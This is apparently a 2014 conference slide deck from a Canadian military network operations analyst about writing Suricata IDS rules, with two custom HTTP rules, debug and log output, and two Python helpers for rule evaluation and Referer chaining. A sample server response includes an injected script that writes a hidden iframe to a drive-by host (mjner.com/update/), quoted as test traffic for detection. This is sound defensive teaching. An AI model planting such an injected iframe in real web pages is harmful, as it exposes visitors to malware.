
CANADIAN FORCES NETWORK OPERATIONS CENTRE (CFNOC) CENTRE D’OPERATIONS DES RESEAUX DES FORCE CANADIANNE (CORFC)

UNCLAS

Hakuna Suricata (it means no worries, except for APT)

LS Pulsifer, Surveillance Analyst, 5 May 2014


Outline

• IDS Overview
• First Thoughts
• Rules of the Jungle
  a. HTTP GET
  b. HTTP 200 OK
• BONUS ROUND!
• Conclusion


First Thoughts

1. Easy Setup
   A. 1400 (w/ comments) line config
   B. ET rules out of the box
   C. Rule management?
2. TURN ON ALL THE THINGS!
3. Output format(s)
4. Fancy-lookin' rules


Rules of the Jungle

# PULSIFER.CA / CATS TEST HTTP RULE
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"THE INTERNET WANTS CATS"; content:"GET"; http_method; content:"/cats.html"; http_uri; content:"pulsifer.ca"; http_header; content:"Windows NT 6.1"; http_user_agent; urilen:<11; classtype:bad-unknown; sid:5000001; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"THE INTERNET GOT CATS"; content:"200"; http_stat_code; content:"OK"; http_stat_msg; content:"iframe src"; http_server_body; classtype:bad-unknown; sid:5000000; rev:1;)


First Rule of the Jungle

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"THE INTERNET WANTS CATS"; content:"GET"; http_method; content:"/cats.html"; http_uri; content:"pulsifer.ca"; http_header; content:"Windows NT 6.1"; http_user_agent; urilen:<11; classtype:bad-unknown; sid:5000001; rev:1;)

GET /cats.html HTTP/1.1

Host: pulsifer.ca

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive


Debug cont.

PACKET:

0000 00 0C 29 DD B4 57 C8 60 00 CB 92 D9 08 00 45 00 ..)..W.` ......E.

0010 00 28 1E DF 40 00 80 06 50 7F 0A 0D 25 01 43 E7 .(..@... P...%.C.

0020 18 7D B3 A1 00 50 80 F4 76 B0 3A F1 3C 4A 50 10 .}...P.. v.:.<JP.

0030 00 FE 00 93 00 00 00 00 00 00 00 00 ........ ....

ALERT CNT: 1

ALERT MSG [00]: THE INTERNET WANTS CATS

ALERT GID [00]: 1

ALERT SID [00]: 5000001

ALERT REV [00]: 1

ALERT CLASS [00]: Potentially Bad Traffic

ALERT PRIO [00]: 2

ALERT FOUND IN [00]: STATE

ALERT IN TX [00]: 0

STREAM DATA LEN: 294

STREAM DATA:

...


Second Rule of the Jungle

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"THE INTERNET GOT CATS"; content:"200"; http_stat_code; content:"OK"; http_stat_msg; content:"iframe src"; http_server_body; classtype:bad-unknown; sid:5000000; rev:1;)

HTTP/1.1 200 OK

Date: Tue, 06 May 2014 02:12:05 GMT

...

<!DOCTYPE html>

<html>

<body>

<script>

document.write('<iframe src="http://mjner.com/update/"></iframe>');

...
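The two rules above, applied to the request and response shown on these slides with a small evaluator written for this page (it is not Suricata code). It models only what the rules rely on: each content modifier limits its match to one part of the parsed HTTP message, and urilen is compared against the URI alone. The response body is reconstructed from the abridged slide.

```python
# Request copied from the slide; response reconstructed from the abridged slide.
REQUEST = (
    "GET /cats.html HTTP/1.1\r\nHost: pulsifer.ca\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\r\n\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\nDate: Tue, 06 May 2014 02:12:05 GMT\r\n\r\n<!DOCTYPE html><html><body>"
    "<script>document.write('<iframe src=\"http://mjner.com/update/\"></iframe>');</script>"
)

def split_http(raw):
    """Return (start line, lowercase header dict, body) for one raw HTTP message."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def request_buffers(raw):
    """Fill the request-side buffers the first rule inspects."""
    start, headers, _ = split_http(raw)
    method, uri, _ = start.split(" ", 2)
    return {
        "http_method": method, "http_uri": uri,
        "urilen": len(uri),  # urilen:<11 is checked against the URI alone
        "http_header": "\r\n".join(f"{k}: {v}" for k, v in headers.items()),
        "http_user_agent": headers.get("user-agent", ""),
    }

def response_buffers(raw):
    """Fill the response-side buffers the second rule inspects."""
    start, _, body = split_http(raw)
    _, code, msg = start.split(" ", 2)
    return {"http_stat_code": code, "http_stat_msg": msg, "http_server_body": body}

# Each rule reduced to its (buffer, content) pairs, plus the urilen bound for the first.
RULE_WANTS_CATS = {"sid": 5000001, "urilen_lt": 11, "match": [
    ("http_method", "GET"), ("http_uri", "/cats.html"),
    ("http_header", "pulsifer.ca"), ("http_user_agent", "Windows NT 6.1")]}
RULE_GOT_CATS = {"sid": 5000000, "match": [
    ("http_stat_code", "200"), ("http_stat_msg", "OK"), ("http_server_body", "iframe src")]}

def evaluate(rule, buffers):
    """True when every content hits its own buffer and any urilen bound holds."""
    if "urilen_lt" in rule and buffers["urilen"] >= rule["urilen_lt"]:
        return False
    return all(content in buffers[buf] for buf, content in rule["match"])
```

A URI one character longer than /cats.html would already fail the urilen check, which is why the slide's test URI fits inside the bound.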


First Rule Debug

TIME: 05/05/2014-22:12:06.264225

PCAP PKT NUM: 8

PKT SRC: wire/pcap

SRC IP: 10.13.37.1

DST IP: 67.231.24.125

PROTO: 6

SRC PORT: 45985

DST PORT: 80

TCP SEQ: 2163504816

TCP ACK: 988888138

FLOW: to_server: TRUE, to_client: FALSE

FLOW Start TS: 05/05/2014-22:12:06.232835

FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE

FLOW ACTION: DROP: FALSE

FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE

FLOW APP_LAYER: DETECTED: TRUE, PROTO 1

FLOWBIT: ET.http.driveby.redkit.uri

PACKET LEN: 60


Bonus Round! GUESS THE META!

05/05/2014-20:13:27.852789 [**] Query TX 214c [**] pulsifer.ca [**] A [**] 10.13.37.1:50922 -> 10.0.0.5:53

05/05/2014-20:13:27.852789 [**] Response TX 214c [**] Recursion Desired [**] 10.0.0.5:53 -> 10.13.37.1:50922

05/05/2014-20:13:27.852789 [**] Response TX 214c [**] pulsifer.ca [**] A [**] TTL 12128 [**] 67.231.24.125 [**] 10.0.0.5:53 -> 10.13.37.1:50922

05/05/2014-20:50:35.379305 172.16.0.10:38457 -> 67.231.24.125:993 TLS: Subject='serialNumber=tsWwnNhDJVx2sppFUBFdevYswWWbQOPg, OU=GT90807209, OU=See www.rapidssl.com/resources/cps (c)14, OU=Domain Control Validated - RapidSSL(R), CN=pulsifer.ca' Issuerdn='C=US, O=GeoTrust, Inc., CN=RapidSSL CA' SHA1='d1:0b:df:ca:39:a9:dc:50:79:cb:73:d0:0b:10:84:e9:92:e8:2d:fd' VERSION='TLSv1'

05/05/2014-20:13:27.921584 pulsifer.ca [**] /cats.html [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 156 bytes [**] 10.13.37.1:44739 -> 67.231.24.125:80

05/05/2014-20:13:28.259719 mjner.com [**] /update/ [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] https://pulsifer.ca/cats.html [**] GET [**] HTTP/1.1 [**] 200 [**] 1123 bytes [**] 10.13.37.1:44740 -> 100.42.50.110:80
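The two http.log lines above, parsed with a small script added for this page (not a Suricata tool). It splits the " [**] " separated fields and then follows each request's Referer back to an earlier request from the same client, which is how the /cats.html fetch is tied to the mjner.com/update/ fetch its iframe caused.

```python
import re
from collections import defaultdict

# Two http.log lines copied from the slide.
HTTP_LOG = """\
05/05/2014-20:13:27.921584 pulsifer.ca [**] /cats.html [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 156 bytes [**] 10.13.37.1:44739 -> 67.231.24.125:80
05/05/2014-20:13:28.259719 mjner.com [**] /update/ [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] https://pulsifer.ca/cats.html [**] GET [**] HTTP/1.1 [**] 200 [**] 1123 bytes [**] 10.13.37.1:44740 -> 100.42.50.110:80
"""

# Field order after the leading "timestamp host" field.
FIELDS = ("uri", "user_agent", "referer", "method", "protocol", "status", "size", "flow")

def parse_http_log(text):
    """Turn http.log lines into dicts; lines with the wrong field count are skipped."""
    records = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(" [**] ")]
        if len(parts) != 9:
            continue
        ts, _, host = parts[0].partition(" ")
        rec = dict(zip(FIELDS, parts[1:]))
        rec.update(timestamp=ts, host=host)
        src, _, dst = rec["flow"].partition(" -> ")
        rec["client"] = src.rsplit(":", 1)[0]
        rec["server_ip"] = dst.rsplit(":", 1)[0]
        records.append(rec)
    return records

def referer_chains(records):
    """Link each request to the earlier request, from the same client, that its Referer names.

    Returns (client, referring host, referred host, referred server IP) tuples.
    """
    by_client = defaultdict(list)
    for rec in records:
        by_client[rec["client"]].append(rec)
    chains = []
    for client, recs in by_client.items():
        urls = {r["host"] + r["uri"]: r for r in recs}
        for r in recs:
            ref = re.sub(r"^https?://", "", r["referer"])  # scheme is not in host+uri
            if ref in urls:
                chains.append((client, urls[ref]["host"], r["host"], r["server_ip"]))
    return chains
```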


Conclusion
